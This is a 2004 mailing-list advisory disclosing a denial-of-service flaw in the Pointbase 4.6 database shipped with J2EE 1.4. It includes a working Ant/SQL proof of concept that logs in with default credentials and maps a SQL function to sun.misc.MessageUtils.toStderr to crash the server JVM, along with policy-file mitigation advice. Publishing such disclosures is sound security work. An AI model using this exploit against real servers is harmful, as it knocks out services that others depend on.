Date: Mon, 19 Jan 2004 01:25:36 +0100 (MEZ)
From: Marc Schoenefeld <[email protected]>
To: [email protected]Subject: Proof-Of-Concept Denial-Of-Service Pointbase 4.6 Java SQL-DB
Hi,
the following code crashes the Pointbase 4.6 database that comes with the
J2EE reference implementation. It is provided as an ant script for
flexibility and to illustrate the involved ressources.
This is a cross-platform denial-of-service java exploit, caused by fact tha=
t
the pointbase installation coming with j2ee/ri 1.4. is not equipped with an
appropriate security manager, thus giving all jars implicitly all
permissions. These unlimited permissions can be exploited by an attacker
using jdbc to crash the jvm running the pointbase server.
Unfortunately there is no policy file provided by Sun defining the necessar=
y
permissions for pointbase, leaving the application server deployer alone in
the rain. And it is a long, time-consuming job figuring out the permissions
when starting with a zero-permissions policy-file.
A recommended approach to find out the necessary permissions of an
application tailored to the use case is test-driving the application with
jchains (www.jchains.org) and using this tool to record the needed
permissions in a permission template. After fine-tuning the recorded
permissions and starting the application with a security manager that is
configured with these permissions the applications runs in a confined
"sandbox" mode, which prevents attackers from access vulnerable jdk routine=
s
like sun.misc.MessageUtils.toStderr.
Further exploitations possible are information disclosure and remote comman=
d
injection (tested on java/winxp and java/linux where I was able to start a
notepad.exe (win) or xemacs (linux)) on the pointbase server via a jdbc
command). Further details on these vulnerabilities and which major JDBC
database are vulnerable (it is not only pointbase having this bug, you may
remember the jboss vulnerability in 9/2003) can be read in an upcoming
report by illegalaccess.org.
If interested in more details you can contact me.
(marc[at]marc-schoenefeld.com) Also send me an email to get a policy file
tailored to the pointbase installation of j2ee14ri. Also feel free to
download the jChains tool and send me your suggestions and further thoughts
about it. jChains is free to use for educational purposes only, so you need
to ask me for restrictions for any commercial usage.
Cheers
Marc Schoenefeld (marc[at]illegalaccess.org)
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Dbuild.xml=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
=2E(.!-- pointbase denial-of-service by marc schoenefeld --".).
=2E(.project default=3D"dos".).
=2E(.property name=3D"host" value=3D"192.168.0.7"/.).
=2E(.target name=3D"dos".).
=2E(.sql
driver=3D"com.pointbase.jdbc.jdbcUniversalDriver"
url=3D"jdbc:pointbase://${host}:9092/sample"
userid=3D"pbpublic"
password=3D"pbpublic"
print=3D"true"
.).
=2E(.![CDATA[
//DROP FUNCTION CRASH5(VARCHAR(20));
CREATE FUNCTION CRASH5(IN P1 VARCHAR(20)) RETURNS VARCHAR(20) LANGUAGE JAVA
NO SQL EXTERNAL NAME "sun.misc.MessageUtils::toStderr" PARAMETER STYLE SQL=
;
SELECT CRASH5(null) from SYSUSERS;
]].).
=2E(.classpath.).
=09.(.pathelement location=3D"pbclient.jar"/.).
=2E(./classpath.).
=2E(./sql.).
=2E(./target.).
=2E(./project.).
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3Dbuild.xml=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
--
Never be afraid to try something new. Remember, amateurs built the
ark; professionals built the Titanic. -- Anonymous
Marc Sch=F6nefeld Dipl. Wirtsch.-Inf. / Software Developer
